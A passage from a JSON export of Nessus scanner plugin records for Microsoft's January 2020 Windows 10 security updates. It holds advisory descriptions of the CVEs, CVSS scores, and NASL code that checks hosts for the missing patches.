script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534276');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (my_os_build = \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534276])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-27T10:29:16", "description": "The remote Windows host is missing security update 4534293.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)", "edition": 9, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534293: Windows 10 Version 1803 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534293.NASL", "href": "https://www.tenable.com/plugins/nessus/132862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132862);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534293\");\n script_xref(name:\"MSFT\", value:\"MS20-4534293\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4534293: Windows 10 Version 1803 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534293.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534293/windows-10-update-kb4534293\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c0e39b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534293.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534293');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534293])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-27T10:29:15", "description": "The remote Windows host is missing security update 4528760.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Subsystem for Linux handles files.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated privileges.\n (CVE-2020-0636)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0624, CVE-2020-0642)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4528760: Windows 10 Version 1903 and Windows 10 Version 1909 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0638", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0624", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0636", "CVE-2020-0631", "CVE-2020-0616", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4528760.NASL", "href": "https://www.tenable.com/plugins/nessus/132857", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132857);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0616\",\n \"CVE-2020-0620\",\n \"CVE-2020-0623\",\n \"CVE-2020-0624\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0636\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4528760\");\n script_xref(name:\"MSFT\", value:\"MS20-4528760\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4528760: Windows 10 Version 1903 and Windows 10 Version 1909 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4528760.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Subsystem for Linux handles files.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated privileges.\n (CVE-2020-0636)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0624, CVE-2020-0642)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely 